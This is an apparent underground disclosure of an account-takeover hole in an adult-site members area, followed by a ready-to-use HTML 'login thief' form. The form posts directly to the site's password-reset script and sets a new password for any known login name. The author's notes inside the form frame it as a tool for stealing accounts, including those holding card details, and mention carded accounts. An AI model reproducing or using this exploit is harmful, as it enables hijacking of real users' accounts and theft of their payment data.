security vulnerability in hustler.com which allows any user to steal another users account and gain access to full access to their account including cc# information no fix yet. hustler.com has been informed. ---------------------------------------------------------------------------- exploit template ---------------------------------------------------------------------------- <!-- E G 0 D 3 A T H --> <HTML> <HEAD><TITLE>HUSTLER LOGIN THEIF BY EGODEATH</TITLE></HEAD> <BODY bgcolor=#000000 text=#FFFFFF> <table border="0"> <th><font colo<b><u>HACKED</b></u> </table> <H2>Change My Password - ego's M0D1Fi3D verzi0n</H2> <FORM METHOD="POST" ACTION="https://members.flyntdigital.com/secure-bin/usr_search_admin/resetpass.pl"> <TABLE BORDER=1 CELLSPACING=0 CELLPADDING=4 WIDTH=500> <TR> <TH VALIGN=TOP WIDTH=40% ALIGN=RIGHT>Highlight the User ID: </TH> <TD> <font color=red>This is the hustler account thief script<br>in order for this to work you must know<br>somones real login name ( if its an old carded<br> account with a nick like XTC, give up<br> you cant steal a froozen account, but<br> yea.. u can change its password...</font> <input type="text" NAME="usr_login" value="a real login name"> </TD> </TR> <TR> <TD align=left>Enter Your New Password</TD> <TD align=right>Enter Password again</TD> </TR> <TR> <TD ALIGN=left> <INPUT TYPE="text" NAME="pass_wd1" VALUE=""> </TD> <TD align=right> <INPUT TYPE="text" NAME="pass_wd2" VALUE=""> </TD> </TR> <TR> <TD COLSPAN=2 ALIGN=CENTER> <INPUT TYPE="submit" NAME="submit" VALUE="Submit"> <INPUT TYPE="reset" NAME="reset" VALUE="Reset"> </TD> </TR> </TABLE> </FORM> </BODY> </HTML>